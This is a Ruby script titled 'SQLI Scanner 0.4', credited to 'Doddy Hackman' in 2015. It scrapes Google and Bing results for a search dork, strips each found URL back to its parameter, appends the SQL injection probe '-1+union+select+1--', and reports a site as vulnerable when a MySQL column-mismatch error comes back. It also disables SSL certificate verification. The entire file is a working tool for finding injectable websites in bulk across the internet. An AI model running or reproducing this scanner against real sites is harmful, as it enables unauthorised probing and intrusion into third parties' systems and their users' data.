SQLI Scanner 0.4

1. #!usr/bin/ruby
2. #SQLI Scanner 0.4
3. #(C) Doddy Hackman 2015
4.  
5. require "open-uri"
6. require "net/http"
7. require "openssl"
8.  
9. # Functions
10.  
11. def toma(web)
12.     begin
13.         return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
14.     rescue
15.         return "Error"
16.     end
17. end
18.  
19.  
20. def toma_ssl(web)
21.     uri = URI.parse(web)
22.     nave = Net::HTTP.new(uri.host, uri.port)
23.     nave.use_ssl = true
24.     nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
25.     return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
26. end
27.  
28.  
29. def tomar(web,arg)
30.     begin
31.         headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
32.         uri = URI(web)
33.         http = Net::HTTP.new(uri.host, uri.port)
34.         return http.post(uri.path,arg, headers).body
35.     rescue
36.         return "Error"
37.     end
38. end
39.  
40. def cortar(pages)
41.     final = ""
42.     finales = []
43.     pages.flatten.each do |page|
44.         if page=~/(.*)=(.*)/
45.             parte1 = $1
46.             parte2 = $2
47.             final = parte1 + "="
48.             finales.push(final)
49.         end
50.     end
51.     return finales
52. end
53.  
54.  
55. def google(dork,pages)
56.  
57.     links = []
58.     dork = dork.sub(/ /,"+")
59.     contador = 0
60.     for i in ("1"..pages)
61.         contador+=10
62.         code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
63.         paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
64.         paginas.flatten.each do |pagina|
65.             partes = pagina
66.             if partes=~/url\?q=(.*)&amp;sa/
67.                 parte = $1
68.                 link = URI::decode(parte)
69.                 links.push(link)
70.             end
71.         end
72.         end
73.         links = links.uniq
74.     return links
75. end
76.  
77. def google_recursive(dork,pages)
78.     dork = dork.sub(/ /,"+")
79.     contador = 0
80.     guardo = []
81.     for i in ("1"..pages)
82.         contador+=10
83.         url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
84.         code = toma_ssl(url)
85.         links = URI::extract(code)
86.         links.each do |link|
87.             if link=~/cache:(.*?):(.*?)\+/
88.                 link_final = "http://"+$2
89.                 link_final = URI::decode(link_final)
90.                 guardo.push(link_final)
91.             end
92.         end
93.     end
94.     guardo = guardo.uniq
95.     return guardo
96. end
97.  
98. def bing(dork,pages)
99.  
100.     guardo = []
101.     dork = dork.sub(/ /,"+")
102.     contador = 0
103.     for i in ("1"..pages)
104.         contador+=10
105.  
106.         code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
107.  
108.         links = code.scan(/<h2><a href="(.*?)" h/)
109.  
110.         links.flatten.each do |link|
111.             link_final = URI::decode(link)
112.             if not link_final=~/http:\/\/778802\.r\.msn\.com\//
113.                 guardo.push(link_final)
114.             end
115.         end
116.  
117.         links = code.scan(/<h3><a href="(.*?)" h/)
118.  
119.         links.flatten.each do |link|
120.             link_final = URI::decode(link)
121.             if not link_final=~/http:\/\/778802\.r\.msn\.com\//
122.                 guardo.push(link_final)
123.             end
124.         end
125.     end
126.     guardo = guardo.uniq
127.     return guardo
128. end
129.  
130. def uso
131.     print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
132.     print "-search_bing : Find in Bing\n"
133.     print "-search_google : Find in Google\n"
134.     print "-scan_bing : Find SQLI in Bing\n"
135.     print "-scan_google : Find SQLI in Google\n"
136.     print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
137. end
138.  
139. def  head
140.     print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
141. end
142.  
143. def copyright
144.     print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
145. end
146.  
147. opcion = ARGV[0]
148. dork = ARGV[1]
149. pages  = ARGV[2]
150.  
151. head()
152.  
153. if !opcion or !dork or !pages
154.     uso()
155. else
156.    
157.     if opcion=="-search_bing"
158.        
159.         print "\n[+] Searching in Bing ...\n\n"
160.        
161.         links = bing(dork,pages)
162.  
163.         print "[+] Pages Count : "+links.count.to_s+"\n\n"
164.  
165.         if links.count.to_s=="0"
166.             print "[-] Links not found\n"
167.         end
168.  
169.         links.flatten.each do |link|
170.             print "[+] Link : "+link+"\n"
171.         end
172.    
173.         print "\n[+] Finished\n"
174.  
175.     elsif opcion=="-search_google"
176.        
177.         print "\n[+] Searching in Google ...\n\n"
178.        
179.         links = google(dork,pages)
180.  
181.         if links.count.to_s=="0"
182.             print "[+] Searching in Google again ...\n\n"
183.             links = google_recursive(dork,pages)
184.         end
185.  
186.         print "[+] Pages Count : "+links.count.to_s
187.    
188.         if links.count.to_s=="0"
189.             print "[-] Links not found"
190.         end
191.  
192.         links.flatten.each do |link|
193.             print "[+] Link : "+link+"\n"
194.         end
195.        
196.         print "\n[+] Finished\n"
197.  
198.     elsif opcion=="-scan_bing"
199.        
200.         print "\n[+] Searching in Bing ...\n\n"
201.        
202.         links = cortar(bing(dork,pages))
203.  
204.         print "[+] Pages Count : "+links.count.to_s+"\n\n"
205.  
206.         if links.count.to_s=="0"
207.             print "[-] Links not found\n"
208.         end
209.  
210.         links.flatten.each do |link|
211.             print "[+] Link : "+link
212.             begin
213.                 url = toma(link + "-1+union+select+1--")
214.                 if url=~/The used SELECT statements have a different number of columns/
215.                     print " [OK]\n\a\a"
216.                 else
217.                     print " [FAIL]\n"
218.                 end
219.             rescue
220.                 print " [FAIL]\n"
221.             end
222.         end
223.    
224.         print "\n[+] Finished\n"
225.        
226.     elsif opcion=="-scan_google"
227.        
228.         print "\n[+] Searching in Google ...\n\n"
229.        
230.         links = cortar(google(dork,pages))
231.  
232.         if links.count.to_s=="0"
233.             print "[+] Searching in Google again ...\n\n"
234.             links = cortar(google_recursive(dork,pages))
235.         end
236.  
237.         print "[+] Pages Count : "+links.count.to_s+"\n\n"
238.    
239.         if links.count.to_s=="0"
240.             print "[-] Links not found"
241.         end
242.  
243.         links.flatten.each do |link|
244.             print "[+] Link : "+link
245.             begin
246.                 url = toma(link + "-1+union+select+1--")
247.                 if url=~/The used SELECT statements have a different number of columns/
248.                     print " [OK]\n\a\a"
249.                 else
250.                     print " [FAIL]\n"
251.                 end
252.             rescue
253.                 print " [FAIL]\n"
254.             end
255.         end
256.    
257.         print "\n[+] Finished\n"
258.     else
259.         print "[-] Bad Option"
260.     end
261. end
262.  
263. copyright()
264.  
265.  
266. #The End ?